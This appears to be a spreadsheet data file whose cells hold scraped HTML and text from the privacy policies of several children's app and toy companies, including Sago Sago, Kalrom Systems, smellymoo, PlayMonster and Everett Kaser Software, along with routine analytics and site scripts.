flex-shrink-0" href="https://www.facebook.com/sagomini/"&gt;&lt;i class="block square-very-thin square-4_5rem-from-xs"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="svg-icon block width-full height-full" x="0px" y="0px" width="20" height="20" viewBox="0 0 20 20"&gt;&lt;path fill="currentColor" d="M10 .4C4.698.4.4</t>
  </si>
  <si>
    <t>4.698.4 10s4.298 9.6 9.6 9.6 9.6-4.298 9.6-9.6S15.302.4 10 .4zm2.274 6.634H10.83c-.17 0-.36.225-.36.524V8.6h1.805l-.273 1.486H10.47v4.46H8.767v-4.46H7.222V8.6h1.545v-.874c0-1.254.87-2.273 2.064-2.273h1.444v1.58z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/i&gt;&lt;/a&gt;&lt;a class="color-orange color-active-on-hover transition-color transition-duration-short transition-ease-out padding-micro block padding-left-smallest border-box flex-shrink-0" href="https://www.instagram.com/sagomini/"&gt;&lt;i class="block square-very-thin square-4_5rem-from-xs"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="svg-icon block width-full height-full" x="0px" y="0px" width="20" height="20" viewBox="0 0 20 20"&gt;&lt;path fill="currentColor" d="M13.498 6.65a1.656 1.656 0 0 0-.95-.948 2.766 2.766 0 0 0-.928-.172c-.527-.024-.685-.03-2.02-.03s-1.493.006-2.02.03a2.766 2.766 0 0 0-.93.172 1.656 1.656 0 0 0-.948.95 2.766 2.766 0 0</t>
  </si>
  <si>
    <t>0-.172.928c-.024.527-.03.685-.03 2.02s.006 1.493.03 2.02a2.766 2.766 0 0 0 .172.93 1.656 1.656 0 0 0 .95.948 2.766 2.766 0 0 0 .928.172c.527.024.685.03</t>
  </si>
  <si>
    <t>2.02.03s1.493-.006 2.02-.03a2.766 2.766 0 0 0 .93-.172 1.656 1.656 0 0 0 .948-.95 2.766 2.766 0 0 0 .172-.928c.024-.527.03-.685.03-2.02s-.006-1.493-.03-2.02a2.766 2.766 0 0</t>
  </si>
  <si>
    <t>0-.172-.93zM9.6 12.17A2.568 2.568 0 1 1 12.168 9.6 2.568 2.568 0 0 1 9.6 12.168zm2.67-4.637a.6.6 0 1 1 .6-.6.6.6 0 0 1-.6.6z"&gt;&lt;/path&gt;&lt;circle fill="currentColor" cx="9.6" cy="9.6" r="1.667"&gt;&lt;/circle&gt;&lt;path fill="currentColor" d="M9.6 0a9.6 9.6 0 1 0 9.6 9.6A9.6 9.6 0 0 0 9.6 0zm4.97 11.66a3.67 3.67 0 0 1-.233 1.215 2.556 2.556 0 0</t>
  </si>
  <si>
    <t>1-1.462 1.462 3.67 3.67 0 0 1-1.213.233c-.534.024-.704.03-2.062.03s-1.528-.006-2.062-.03a3.67 3.67 0 0 1-1.213-.233 2.556 2.556 0 0 1-1.462-1.462 3.67 3.67 0 0 1-.233-1.213c-.024-.534-.03-.704-.03-2.062s.006-1.528.03-2.062a3.67 3.67 0 0 1 .232-1.213 2.556 2.556 0 0 1 1.463-1.463 3.67 3.67 0 0 1</t>
  </si>
  <si>
    <t>1.213-.232c.534-.024.704-.03 2.062-.03s1.528.006 2.062.03a3.67 3.67 0 0 1 1.213.232 2.556 2.556 0 0 1 1.462 1.463 3.67 3.67 0 0 1 .233 1.213c.024.534.03.704.03 2.062s-.006 1.528-.03 2.062z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/i&gt;&lt;/a&gt;&lt;a class="color-orange color-active-on-hover transition-color transition-duration-short transition-ease-out padding-micro block padding-left-smallest border-box flex-shrink-0" href="https://www.pinterest.ca/sagominitoys/"&gt;&lt;i class="block square-very-thin square-4_5rem-from-xs"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="svg-icon block width-full height-full" x="0px" y="0px" width="20" height="20" viewBox="0 0 20 20"&gt;&lt;path fill="currentColor" d="M10 .4C4.698.4.4</t>
  </si>
  <si>
    <t>4.698.4 10s4.298 9.6 9.6 9.6 9.6-4.298 9.6-9.6S15.302.4 10 .4zm.657 11.875c-.616-.047-.874-.352-1.356-.644-.264 1.392-.588 2.726-1.548 3.423-.297-2.104.434-3.682.774-5.36-.58-.974.07-2.935 1.29-2.453 1.504.596-1.3 3.625.582 4.004 1.966.394 2.77-3.412 1.55-4.648-1.762-1.787-5.127-.04-4.713 2.517.1.625.747.815.258 1.678-1.127-.25-1.464-1.138-1.42-2.323.07-1.94 1.743-3.3 3.42-3.486 2.124-.235 4.116.78 4.392 2.778.31 2.254-.96 4.693-3.228 4.517z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/i&gt;&lt;/a&gt;&lt;a class="color-orange color-active-on-hover transition-color transition-duration-short transition-ease-out padding-micro block padding-left-smallest border-box flex-shrink-0" href="https://www.youtube.com/user/SagoSagoToys"&gt;&lt;i class="block square-very-thin square-4_5rem-from-xs"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="svg-icon block width-full height-full" x="0px" y="0px" width="20" height="20" viewBox="0 0 20 20"&gt;&lt;path fill="currentColor" d="M11.603 9.833L9.357 8.785c-.196-.09-.357.01-.357.228v1.974c0 .217.16.32.357.228l2.245-1.048c.197-.092.197-.242 0-.334zM10 .4C4.698.4.4 4.698.4 10s4.298 9.6 9.6 9.6 9.6-4.298 9.6-9.6S15.302.4 10 .4zm0 13.5c-4.914 0-5-.443-5-3.9s.086-3.9 5-3.9 5 .443 5 3.9-.086 3.9-5 3.9z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/i&gt;&lt;/a&gt;&lt;a class="color-orange color-active-on-hover transition-color transition-duration-short transition-ease-out padding-micro block padding-left-smallest border-box flex-shrink-0" href="https://www.linkedin.com/company/sagomini/"&gt;&lt;i class="block square-very-thin square-4_5rem-from-xs"&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" class="svg-icon block width-full height-full" width="45" height="45" viewBox="0 0 45 45" fill="none"&gt;&lt;circle cx="22.5" cy="22.5" r="22.5" fill="#FC7A38"&gt;&lt;/circle&gt;&lt;path d="M33.0417 11H11.9583C11.4312 11 11 11.4312 11 11.9583V33.0417C11 33.5687 11.4312 34 11.9583 34H33.0417C33.5687 34 34 33.5687 34 33.0417V11.9583C34 11.4312 33.5687 11 33.0417 11ZM17.8042 30.5979H14.4021V19.625H17.8042V30.5979ZM16.1271 18.1396C15.025 18.1396 14.1625 17.2771 14.1625 16.175C14.1625 15.0729 15.025 14.2104 16.1271 14.2104C17.2292 14.2104 18.0917 15.0729 18.0917 16.175C18.0917 17.2292 17.2292 18.1396 16.1271 18.1396ZM30.5979 30.5979H27.1958V25.2792C27.1958 23.9854 27.1958 22.3563 25.4229 22.3563C23.65 22.3563 23.3625 23.7458 23.3625 25.1833V30.5979H19.9604V19.625H23.2187V21.1104H23.2667C23.6979 20.2479 24.8479 19.3375 26.4771 19.3375C29.9271 19.3375 30.55 21.5896 30.55 24.5604V30.5979H30.5979Z" fill="white"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/i&gt;&lt;/a&gt;&lt;/nav&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="width-full max-width-xl padding-horizontal-small padding-horizontal-largest-from-sm border-box margin-horizontal-auto || flexbox flex-wrap flex-center padding-vertical-largest"&gt;&lt;div class="nav-link-ctn || font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Apps" target="_self" class="js-nav-link btn-page-apps nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/apps/"&gt;Apps&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half js-region-restricted  js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Blog" target="_self" class="js-nav-link btn-page-blog nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/blog/"&gt;Blog&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half js-region-restricted  js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Press" target="_self" class="js-nav-link btn-page-press nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/press/"&gt;Press&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Help" target="_blank" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="https://help.sagomini.com/"&gt;Help&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Jobs" target="_self" class="js-nav-link nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/careers/"&gt;Jobs&lt;/a&gt;&lt;/div&gt;&lt;div class="nav-link-ctn || font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half js-region-restricted-item "&gt;&lt;a role="menuitem" data-ga-cat="menu" data-ga-label="en/Contact" target="_self" class="js-nav-link btn-page-contact btn-page-contact-send nav-link inline-block color-dark color-active-when-selected color-link-on-hover transition-color transition-duration-short transition-ease-quad-out text-nowrap padding-smallest padding-smaller-from-sm" href="/contact/"&gt;Contact&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/nav&gt;&lt;/header&gt;&lt;div id="site-pages" class="js-fix-scroll-margin"&gt;&lt;div class="page" id="page-index-detail"&gt;&lt;main class="js-article-ctn relative js-footer-hide-newsletter"&gt;&lt;article data-show-newsletter="false" data-handle="privacy-policy/" class="js-article"&gt;&lt;section class="width-full max-width-xl margin-horizontal-auto border-box padding-horizontal-small padding-horizontal-largest-from-xs"&gt;&lt;div class="max-width-md margin-horizontal-auto"&gt;&lt;h1 class="text-align-center font-base bold line-height-tighter text-average text-tall-from-xs text-taller-from-sm text-tallest-from-lg letter-spacing-half"&gt;Privacy Policy&lt;/h1&gt;&lt;/div&gt;&lt;/section&gt;&lt;section class="width-full max-width-xl margin-horizontal-auto border-box padding-horizontal-small padding-horizontal-largest-from-xs margin-top-large"&gt;&lt;div class="max-width-fatter margin-horizontal-auto"&gt;&lt;p class="font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;&lt;meta charset="utf-8"&gt;&lt;/p&gt;&lt;h4 class="margin-top-large margin-top-largest-from-xs font-base bold line-height-tight text-shorter text-short-from-xs text-shorty-from-sm text-current-from-lg letter-spacing-half"&gt;&lt;strong&gt;About Our Privacy Policy&lt;/strong&gt;&lt;/h4&gt;&lt;p class="margin-top-large margin-top-largest-from-xs font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;Hello! Welcome to the SAGO SAGO Privacy Policy.&lt;/p&gt;&lt;p class="margin-top-large margin-top-largest-from-xs font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;Sago Sago (owned and operated by Spin Master Ltd.) is committed to protecting your privacy.</t>
  </si>
  <si>
    <t xml:space="preserve">While our apps are designed for young kids and parents, our [website](https://www.sagomini.com) is intended for adult use only. We take privacy seriously at Sago Sago and this policy is designed to share the information we collect and how we use it.  &lt;/p&gt;&lt;p class="margin-top-large margin-top-largest-from-xs font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;This Privacy Policy is also part of the Terms of Use that explain your rights and responsibilities, as well as Sago Sago’s, when using our services and sites.&lt;/p&gt;&lt;p class="margin-top-large margin-top-largest-from-xs font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;If you don’t agree with this Privacy Policy or the Terms of Use, you should not use these sites and services. </t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p class="margin-top-large margin-top-largest-from-xs font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;&lt;a class="display-block width-full" href="https://cert.privo.com/#/companies/tocaboca"&gt;&lt;img class="inline max-width-full" alt="" src="/workspace/uploads/files/coppa.png"&gt;&lt;/a&gt;&lt;/p&gt;&lt;h4 class="margin-top-large margin-top-largest-from-xs font-base bold line-height-tight text-shorter text-short-from-xs text-shorty-from-sm text-current-from-lg letter-spacing-half"&gt;&lt;strong&gt;Kids Privacy Assured by PRIVO: COPPA Safe Harbor Certification&lt;br&gt;&lt;/strong&gt;&lt;/h4&gt;&lt;p class="margin-top-large margin-top-largest-from-xs font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;Sago Sago (owned and operated by Spin Master Ltd) is a member of the PRIVO Kids Privacy Assured COPPA Safe Harbor Certification Program (“the Program”). The Program certification applies to the digital properties listed on the validation page that is viewable by clicking on the PRIVO Seal.</t>
  </si>
  <si>
    <t>PRIVO is an independent, third-party organization committed to safeguarding children's personal information collected online. The PRIVO COPPA certification Seal posted on this page indicates Sago Sago has established COPPA compliant privacy practices and has agreed to submit to PRIVO’s oversight and consumer dispute resolution process.  &lt;/p&gt;&lt;p class="margin-top-large margin-top-largest-from-xs font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;If you have questions or concerns about our privacy practices, please contact us at (416) 703-6459 or privacy@sagosago.com.</t>
  </si>
  <si>
    <t>If you have further concerns after you have contacted us, you can contact PRIVO directly by emailing privacy@privo.com.&lt;/p&gt;&lt;h4 class="margin-top-large margin-top-largest-from-xs font-base bold line-height-tight text-shorter text-short-from-xs text-shorty-from-sm text-current-from-lg letter-spacing-half"&gt;&lt;strong&gt;Information We Collect&lt;/strong&gt;&lt;/h4&gt;&lt;p class="margin-top-large margin-top-largest-from-xs font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half"&gt;We collect the following personal data from parents and grownups:&lt;/p&gt;&lt;ul class="margin-top-small padding-left-large border-box text-left list-style-type-none "&gt;
&lt;ul class="padding-left-large border-box text-left margin-top-small list-style-type-none"&gt;
&lt;li class="relative font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half margin-top-smallest margin-top-small-from-xs"&gt;&lt;div class="inline-block absolute left-minus-large border-box border-solid border-slimmer border-radius-full border-color-orange" style="top:0.45em; width:0.5em; height:0.5em;"&gt;&lt;/div&gt;&lt;div&gt;Name (screen or nickname)&lt;/div&gt;&lt;/li&gt;
&lt;li class="relative font-base line-height-looser text-very-shorter text-shorter-from-xs text-short-from-sm letter-spacing-half margin-top-smallest margin-top-small-from-xs"&gt;&lt;div class="inline-block absolute left-minus-large border-box border-solid border-slimmer border-radius-full border-color-orange"</t>
  </si>
  <si>
    <t xml:space="preserve">Sand Draw App Privacy Policy_x005F_x000D_
 We at Kalrom Systems LTD (“we”) respect your privacy and value the relationship we have with you. Your use of this application is subject to this Privacy Policy._x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>Information We Collect_x005F_x000D_
 We use Google Analytics which may collect information about geographic location and information about the way you use our app. Please visit for more information about the information Google Analytics may collect.</t>
  </si>
  <si>
    <t xml:space="preserve">The app uses 3rd party ad networks which may collect information about your general location, language, history of apps installed on your device network information, your device id and other information._x005F_x000D_
_x005F_x000D_
 We use Google Firebase to anonymously authenticate users and store general app usage data such as:_x005F_x000D_
- user purchase history in the app_x005F_x000D_
- operating system kind_x005F_x000D_
- last activity time_x005F_x000D_
- number of drawings_x005F_x000D_
_ x000D_
Advertisements_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>We work with the following ad networks, therfore, their privacy agreements applies to ours as well:_x005F_x000D_
_x005F_x000D_
AdMob – for more information please visit https://support.google.com/admob/answer/6128543_x005F_x000D_
Unity Ads - for more information please visit https://unity3d.com/legal/privacy-policy_x005F_x000D_
_ x000D_
Updates To This Privacy Policy_x005F_x000D_
 This Privacy Policy may be updated periodically and without prior notice to you to reflect changes in our personal information practices._x005F_x000D_
_x005F_x000D_
How to Contact Us_x005F_x000D_
If you have any questions or comments about this privacy notice, please contact us by email at support@KalromSystems.com.</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
	&lt;title&gt;privacy policy&lt;/title&gt;_x005F_x000D_
	&lt;meta content="text/html; charset=utf-8" http-equiv="Content-Type" /&gt;_x005F_x000D_
	&lt;meta content="IE=Edge" http-equiv="X-UA-Compatible" /&gt;_x005F_x000D_
	&lt;link href="/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /&gt;_x005F_x000D_
 &lt;/head&gt;_x005F_x000D_
&lt;body&gt;_x005F_x000D_
&lt;table border="0" style="width: 100%; background-color: white; background-position: initial initial; background-repeat: initial initial;"&gt;_x005F_x000D_
	&lt;tbody&gt;_x005F_x000D_
		&lt;tr&gt;_x005F_x000D_
			&lt;td style="background-color: transparent; border-color: #ffffff; padding: 0.15in;"&gt;_x005F_x000D_
			&lt;p style="text-align: center; line-height: normal;"&gt;&lt;strong&gt;&lt;span style="font-family: 'Verdana','sans-serif'; font-size: 14pt;"&gt;Sandbox Privacy Policy&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
			&lt;p style="line-height: normal;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: 'Verdana','sans-serif';"&gt;This privacy policy discloses the privacy practices for the '&lt;strong&gt;Sand:box&lt;/strong&gt;' app made by &lt;a href="http://www.smellymoo.com"&gt;smellymoo&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
			&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: 'Verdana','sans-serif';"&gt;No information is gathered by the app, We only collect information that you voluntarily give us via email.</t>
  </si>
  <si>
    <t xml:space="preserve">That information is not shared and is secured by gmail services.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
			&lt;p style="line-height: normal;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: 'Verdana','sans-serif';"&gt;We will use your information to respond to you, regarding the reason you contacted us. We will not share your information with any third party, other than as necessary to fulfill your request.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
			&lt;/td&gt;_x005F_x000D_
		&lt;/tr&gt;_x005F_x000D_
	&lt;/tbody&gt;_x005F_x000D_
&lt;/table&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"&gt;
&lt;head&gt; &lt;script type="text/javascript"&gt;if(!gform){document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0});var gform={domLoaded:!1,scriptsLoaded:!1,initializeOnLoaded:function(o){gform.domLoaded&amp;&amp;gform.scriptsLoaded?o():!gform.domLoaded&amp;&amp;gform.scriptsLoaded?window.addEventListener("DOMContentLoaded",o):document.addEventListener("gform_main_scripts_loaded",o)},hooks:{action:{},filter:{}},addAction:function(o,n,r,t){gform.addHook("action",o,n,r,t)},addFilter:function(o,n,r,t){gform.addHook("filter",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,n,r)},addHook:function(o,n,r,t,i){null==gform.hooks[o][n]&amp;&amp;(gform.hooks[o][n]=[]);var e =gform.hooks[o][n];null==i&amp;&amp;(i=n+"_"+e.length),null==t&amp;&amp;(t=10),gform.hooks[o][n].push({tag:i,callable:r,priority:t})},doHook:function(o,n,r){if(r=Array.prototype.slice.call(r,1),null!=gform.hooks[o][n]){var t,i=gform.hooks[o][n];i.sort(function(o,n){return o.priority-n.priority});for(var e=0;e&lt;i.length;e++)"function"!=typeof(t=i[e].callable)&amp;&amp;(t=window[t]),"action"==o?t.apply(null,r):r[0]=t.apply(null,r)}if("filter"==o)return r[0]},removeHook:function(o,n,r,t){if(null!=gform.hooks[o][n])for(var i=gform.hooks[o][n],e=i.length-1;0&lt;=e;e--)null!=t&amp;&amp;t!=i[e].tag||null!=r&amp;&amp;r!=i[e].priority||i.splice(e,1)}}}&lt;/script&gt;
    &lt;meta charset="UTF-8"&gt;&lt;script type="text/javascript"&gt;(window.</t>
  </si>
  <si>
    <t>NREUM||(NREUM={})).init={ajax:{deny_list:["bam.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-81655ef4353a6231ab6",applicationID:"1062029700"};;(()=&gt;{var e,t,r={8768:(e,t,r)=&gt;{"use strict";r.d(t,{T:()=&gt;n,p:()=&gt;i});const n=/(iPad|iPhone|iPod)/g.test(navigator.userAgent),i=n&amp;&amp;Boolean("undefined"==typeof SharedWorker)},6562:(e,t,r)=&gt;{"use strict";r.d(t,{P_:()=&gt;v,Mt:()=&gt;p,C5:()=&gt;d,DL:()=&gt;w,OP:()=&gt;R,lF:()=&gt;z,Yu:()=&gt;A,Dg:()=&gt;h,CX:()=&gt;f,GE:()=&gt;y,sU:()=&gt;M});var n={};r.r(n),r.d(n,{agent:()=&gt;x,match:()=&gt;k,version:()=&gt;j});var i=r(6797),o=r(909),a=r(8610);class s{constructor(e,t){try{if(!e||"object"!=typeof e)return(0,a. Z)("New setting a Configurable requires an object as input");if(!t||"object"!=typeof t)return(0,a. Z)("Setting a Configurable requires a model to set its initial properties");Object.assign(this,t),Object.entries(e).forEach((e=&gt;{let[t,r]=e;const n=(0,o.q)(t);n.length&amp;&amp;r&amp;&amp;"object"==typeof r&amp;&amp;n.forEach((e=&gt;{e in r&amp;&amp;((0,a.</t>
  </si>
  <si>
    <t>This may cause unintended consequences or missing data...")),this.features[t.featureName]=new t(this.agentIdentifier,this.sharedAggregator)}})),(0,P.Qy)(this.agentIdentifier,this.features,t)}catch(e){(0,v.Z)("Failed to initialize all enabled instrument classes (agent aborted) -",e);for(const e in this.features)this.features[e].abortHandler?.();const r=(0,P.fP)();return delete r.initializedAgents[this.agentIdentifier]?.api,delete r.initializedAgents[this.agentIdentifier]?.[t],delete this.sharedAggregator,r.ee?.abort(),delete r.ee?.get(this.agentIdentifier),!1}}}({features:[A,R,Z],loaderType:"lite"})})(),window.NRBA=o})();&lt;/script&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no"&gt;
&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
&lt;link rel="pingback" href="https://www.playmonster.com/xmlrpc.php"&gt;
&lt;link href="https://fonts.googleapis.com/ css?family=Luckiest+Guy" rel="stylesheet"&gt;
    &lt;script type=&amp;rsquo;text/javascript&amp;rsquo; src=&amp;rsquo;https://yourdomain.co.uk/wp-content/themes/theme/js/jquery.min.js&amp;rsquo;&gt;&lt;/script&gt;
&lt;title&gt;Privacy Policy &amp;#8211; PlayMonster&lt;/title&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Google Tag Manager for WordPress by gtm4wp.com --&gt;
&lt;script data-cfasync="false" data-pagespeed-no-defer type="text/javascript"&gt;//&lt;![CDATA[
	var gtm4wp_datalayer_name = "dataLayer";
	var dataLayer = dataLayer || [];_x005F_x000D_
	var gtm4wp_use_sku_instead        = 1;_x005F_x000D_
	</t>
  </si>
  <si>
    <t>var gtm4wp_id_prefix              = '';_ x000D_
	var gtm4wp_remarketing            = false;_x005F_x000D_
	var gtm4wp_eec                    = 1;_x005F_x000D_
	var gtm4wp_classicec              = 1;_x005F_x000D_
	var gtm4wp_currency               = 'USD';_x005F_x000D_
	var gtm4wp_product_per_impression = 20;_x005F_x000D_
	var gtm4wp_needs_shipping_address = false;_x005F_x000D_
	var gtm4wp_business_vertical      = 'retail';_x005F_x000D_
	var gtm4wp_business_vertical_id   = 'id';
//]]&gt;
&lt;/script&gt;
&lt;!-- End Google Tag Manager for WordPress by gtm4wp.com --&gt;&lt;script</t>
  </si>
  <si>
    <t>&gt; window._wca = window._wca ||</t>
  </si>
  <si>
    <t>[];&lt;/script&gt;_x005F_x000D_
&lt;link rel='dns-prefetch' href='//www.playmonster.com' /&gt;
&lt;link rel='dns-prefetch' href='//www.google.com' /&gt;
&lt;link rel='dns-prefetch' href='//stats.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel='dns-prefetch' href='//v0.wordpress.com' /&gt;
&lt;link rel='dns-prefetch' href='//i0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//i1.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//i2.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//c0.wp.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="PlayMonster &amp;raquo; Feed" href="https://www.playmonster.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="PlayMonster &amp;raquo; Comments Feed" href="https://www.playmonster.com/comments/feed/" /&gt;
		&lt;!-- This site uses the Google Analytics by ExactMetrics plugin v6.7.0 - Using Analytics tracking - https://www.exactmetrics.com/ --&gt;
							&lt;script src="//www.googletagmanager.com/gtag/js?id=UA-15565673-2"  type="text/javascript" data-cfasync="false"&gt;&lt;/script&gt;
			&lt;script type="text/javascript" data-cfasync="false"&gt;
				var em_version = '6.7.0';
				var em_track_user = true;
				var em_no_track_reason = '';
								var disableStr = 'ga-disable-UA-15565673-2';
				/* Function to detect opted out users */
				function __gtagTrackerIsOptedOut() {
					return document.cookie.indexOf( disableStr + '=true' ) &gt; - 1;
				}
				/* Disable tracking if the opt-out cookie exists.</t>
  </si>
  <si>
    <t>*/
				if ( __gtagTrackerIsOptedOut() ) {
					window[disableStr] = true;
				}
				/* Opt-out function */
				function __gtagTrackerOptout() {
					document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
					window[disableStr] = true;
				}
				if ( 'undefined' === typeof gaOptout ) {
					function gaOptout() {
						__gtagTrackerOptout();
					}
				}
								window.dataLayer = window.dataLayer || [];
				if ( em_track_user ) {
					function __gtagTracker() {dataLayer.push( arguments );}
					__gtagTracker( 'js', new Date() );
					__gtagTracker( 'set', {
						'developer_id.dNDMyYj' : true,
						                    });
					__gtagTracker( 'config', 'UA-15565673-2', {
						forceSSL:t</t>
  </si>
  <si>
    <t>XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml" xmlns:ops="http://www.idpf.org/2007/ops" xml:lang="en"&gt;
&lt;head&gt;
  &lt;title&gt;Privacy Policy&lt;/title&gt;
  &lt;link href="misc/kaser.css" type="text/css" rel="stylesheet" /&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class=rowhead&gt;&lt;a href="index.html"&gt;&lt;img src="misc/EKSheader.png" width="930" height="102" border="0"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=rowsuccess&gt;
	&lt;p style="margin-top: 5px; margin-left: 10px; margin-right: 10px; text-align: justify; font-size: 125%;"&gt;
		&lt;br&gt;
		&lt;strong&gt; Everett Kaser Software PRIVACY POLICY&lt;/strong&gt;&lt;br&gt;
		&lt;br&gt;
		We do not collect, nor do we transmit, any personal information beyond that necessary to process purchases.&lt;br&gt;
		&lt;br&gt;
		We guarantee that we will never sell, rent, give or distribute your personal information (email, address, credit card, etc) to &lt;em&gt;anyone&lt;/em&gt; else.&lt;br&gt;
		&lt;br&gt;
		&lt;strong&gt; We, too, hate spammers and mad-dog marketeers!&lt;/strong&gt;&lt;br&gt;
		&lt;br&gt;
		If you have any questions or problems at any time, please let us know!&lt;br&gt;
		&lt;br&gt;
		&lt;hr style="width: 100%; height: 2px;"&gt;
		&lt;span style="margin-left: 2.5em;"&gt;e-mail:&lt;br&gt;&lt;/span&gt;
		&lt;span style="margin-left: 5em;"&gt;&lt;a href="mailto:everett@kaser.com"&gt;everett@kaser.com&lt;/a&gt;&lt;br&gt;&lt;/span&gt;
		&lt;span style="margin-left: 2.5em;"&gt;phone:&lt;br&gt;&lt;/span&gt;
		&lt;span style="margin-left: 5em;"&gt;1-541-928-5259&lt;br&gt;&lt;/span&gt;
		&lt;span style="margin-left: 2.5em;"&gt;post:&lt;br&gt;&lt;/span&gt;
		&lt;span style="margin-left: 5em;"&gt;Everett Kaser Software&lt;br&gt;&lt;/span&gt;
		&lt;span style="margin-left: 5em;"&gt;POB 403&lt;br&gt;&lt;/span&gt;
		&lt;span style="margin-left: 5em;"&gt;Albany OR 97321-0117&lt;br&gt;&lt;/span&gt;
